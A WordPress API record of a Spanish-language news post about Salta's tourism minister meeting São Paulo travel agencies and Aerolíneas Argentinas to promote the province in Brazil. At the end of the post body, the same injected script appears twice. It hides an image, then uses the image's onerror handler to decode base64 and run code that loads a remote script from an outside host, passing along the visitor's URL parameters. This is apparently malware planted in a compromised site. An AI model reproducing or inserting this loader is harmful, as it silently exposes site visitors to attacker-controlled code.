{"id":1219,"date":"2022-08-03T10:14:53","date_gmt":"2022-08-03T13:14:53","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1219"},"modified":"2025-08-14T00:39:37","modified_gmt":"2025-08-14T03:39:37","slug":"con-capacitacion-y-acciones-de-promocion-salta-refuerza-el-posicionamiento-en-brasil","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1219","title":{"rendered":"Con capacitaci\u00f3n y acciones de promoci\u00f3n Salta refuerza el posicionamiento en Brasil"},"content":{"rendered":"\n<h3 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#b93758\">El ministro Pe\u00f1a junto a Aerol\u00edneas Argentinas mantuvo encuentro con agencias de viaje de San Pablo que comercializan Salta entre sus productos tur\u00edsticos.<\/h3>\n\n\n\n<p>El equipo de promoci\u00f3n internacional de Salta encabezado por el ministro de Turismo y Deportes&nbsp;<strong>Mario Pe\u00f1a<\/strong>, en San Pablo mantuvo reuniones con agencias de viaje de Brasil en el marco del trabajo para reforzar el posicionamiento de la provincia en ese importante mercado tur\u00edstico, estrategia que est\u00e1 vinculada a un trabajo en conjunto con Aerol\u00edneas Argentinas.<br>&nbsp;<br>La ruta \u00e1rea directa entre Salta y San Pablo abri\u00f3 una ventana de oportunidades para la provincia al tener conexi\u00f3n directa con un mercado de 40 millones de personas, es por eso que desde hace meses se realizan acciones que se profundizaron en las \u00faltimas semanas a partir del inicio de operaciones.<br>&nbsp;<br>El ministro Pe\u00f1a se reuni\u00f3 con representantes de cinco agencias de viaje para cerrar acuerdos que permitan tener a Salta en sus paquetes tur\u00edsticos. La provincia dentro de su oferta cuenta con productos de inter\u00e9s para el brasilero, que durante julio represent\u00f3 el 22% de los turistas internacionales que recorrieron los distintos municipios salte\u00f1os.<\/p>\n\n\n\n<p>\u00abSalta tiene una oportunidad \u00fanica de crecimiento como destino tur\u00edstico receptivo del mercado brasilero, ya lo hemos visto reflejado en los datos de julio. Debemos continuar trabajando juntos en la consolidaci\u00f3n de la ruta a\u00e9rea directa con San Pablo\u00bb, se\u00f1al\u00f3 el ministro Mario Pe\u00f1a. Adem\u00e1s&nbsp; agradeci\u00f3 el trabajo y acompa\u00f1amiento del Ministerio de Turismo y Deportes de la Naci\u00f3n a trav\u00e9s de su equipo en&nbsp;Inprotur Naci\u00f3n.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/3620-con-capacitacion-y-acciones-de-promocion-salta-refuerza-el-posicionamiento-en-brasil.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/3620-con-capacitacion-y-acciones-de-promocion-salta-refuerza-el-posicionamiento-en-brasil.jpg\" alt=\"Con capacitaci\u00f3n y acciones de promoci\u00f3n Salta refuerza el posicionamiento en Brasil.\"\/><\/a><\/figure>\n\n\n\n<p>El funcionario salte\u00f1o junto al gerente comercial de la oficina de Aerol\u00edneas Argentinas Iv\u00e1n Cadah\u00eda, se reunieron con Edson Ruy (Operadora Mondiale) Arnaldo Franken (Diversa) Aldo Leone (Agaxtur) Ana Mar\u00eda Berto (Orinter) y Sylvio Ferraz (CVC).<\/p>\n\n\n\n<p>Hoy iniciaron capacitaciones a operadores brasileros que hasta el viernes estar\u00e1n &nbsp;a cargo de la directora ejecutiva de Inprotur Salta, Mar\u00eda Eugenia Cornejo y de Mart\u00edn Yaguado del Tren a las Nubes.<br>&nbsp;<br>A trav\u00e9s de Inprotur Salta este a\u00f1o se realizaron fam press y fam tour para familiarizar a los actores de la industria tur\u00edstica de Salta sobre las virtudes y productos que tiene la provincia para ofrecer. Directivos de agencias de viajes, periodistas e influencers disfrutaron de la cultura, paisajes y gastronom\u00eda local.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"839\" height=\"600\" data-id=\"1221\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1145-con-capacitacion-y-acciones-de-promocion-salta-refuerza-el-posicionamiento-en-brasil.jpg\" alt=\"\" class=\"wp-image-1221\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1145-con-capacitacion-y-acciones-de-promocion-salta-refuerza-el-posicionamiento-en-brasil.jpg 839w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1145-con-capacitacion-y-acciones-de-promocion-salta-refuerza-el-posicionamiento-en-brasil-300x215.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1145-con-capacitacion-y-acciones-de-promocion-salta-refuerza-el-posicionamiento-en-brasil-768x549.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1145-con-capacitacion-y-acciones-de-promocion-salta-refuerza-el-posicionamiento-en-brasil-696x498.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1145-con-capacitacion-y-acciones-de-promocion-salta-refuerza-el-posicionamiento-en-brasil-587x420.jpg 587w\" sizes=\"(max-width: 839px) 100vw, 839px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"800\" height=\"600\" data-id=\"1223\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1146-con-capacitacion-y-acciones-de-promocion-salta-refuerza-el-posicionamiento-en-brasil.jpg\" alt=\"\" class=\"wp-image-1223\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1146-con-capacitacion-y-acciones-de-promocion-salta-refuerza-el-posicionamiento-en-brasil.jpg 800w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1146-con-capacitacion-y-acciones-de-promocion-salta-refuerza-el-posicionamiento-en-brasil-300x225.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1146-con-capacitacion-y-acciones-de-promocion-salta-refuerza-el-posicionamiento-en-brasil-768x576.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1146-con-capacitacion-y-acciones-de-promocion-salta-refuerza-el-posicionamiento-en-brasil-696x522.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1146-con-capacitacion-y-acciones-de-promocion-salta-refuerza-el-posicionamiento-en-brasil-560x420.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1146-con-capacitacion-y-acciones-de-promocion-salta-refuerza-el-posicionamiento-en-brasil-80x60.jpg 80w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1146-con-capacitacion-y-acciones-de-promocion-salta-refuerza-el-posicionamiento-en-brasil-265x198.jpg 265w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"889\" height=\"600\" data-id=\"1222\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1147-con-capacitacion-y-acciones-de-promocion-salta-refuerza-el-posicionamiento-en-brasil.jpg\" alt=\"\" class=\"wp-image-1222\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1147-con-capacitacion-y-acciones-de-promocion-salta-refuerza-el-posicionamiento-en-brasil.jpg 889w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1147-con-capacitacion-y-acciones-de-promocion-salta-refuerza-el-posicionamiento-en-brasil-300x202.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1147-con-capacitacion-y-acciones-de-promocion-salta-refuerza-el-posicionamiento-en-brasil-768x518.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1147-con-capacitacion-y-acciones-de-promocion-salta-refuerza-el-posicionamiento-en-brasil-696x470.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1147-con-capacitacion-y-acciones-de-promocion-salta-refuerza-el-posicionamiento-en-brasil-622x420.jpg 622w\" sizes=\"(max-width: 889px) 100vw, 889px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"908\" height=\"600\" data-id=\"1220\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1148-con-capacitacion-y-acciones-de-promocion-salta-refuerza-el-posicionamiento-en-brasil.jpg\" alt=\"\" class=\"wp-image-1220\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1148-con-capacitacion-y-acciones-de-promocion-salta-refuerza-el-posicionamiento-en-brasil.jpg 908w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1148-con-capacitacion-y-acciones-de-promocion-salta-refuerza-el-posicionamiento-en-brasil-300x198.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1148-con-capacitacion-y-acciones-de-promocion-salta-refuerza-el-posicionamiento-en-brasil-768x507.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1148-con-capacitacion-y-acciones-de-promocion-salta-refuerza-el-posicionamiento-en-brasil-696x460.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/1148-con-capacitacion-y-acciones-de-promocion-salta-refuerza-el-posicionamiento-en-brasil-636x420.jpg 636w\" sizes=\"(max-width: 908px) 100vw, 908px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/con-capacitacion-y-acciones-de-promocion-salta-refuerza-el-posicionamiento-en-brasil-83992\" target=\"_blank\" rel=\"noreferrer noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El ministro Pe\u00f1a junto a Aerol\u00edneas Argentinas mantuvo encuentro con agencias de viaje de San Pablo que comercializan Salta entre sus productos tur\u00edsticos. El equipo de promoci\u00f3n internacional de Salta encabezado por el ministro de Turismo y Deportes&nbsp;Mario Pe\u00f1a, en San Pablo mantuvo reuniones con agencias de viaje de Brasil en el marco del trabajo [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1224,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,22],"tags":[],"class_list":{"0":"post-1219","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-internacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1219"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1219"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1219\/revisions"}],"predecessor-version":[{"id":7410,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1219\/revisions\/7410"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1224"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1219"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1219"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1219"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}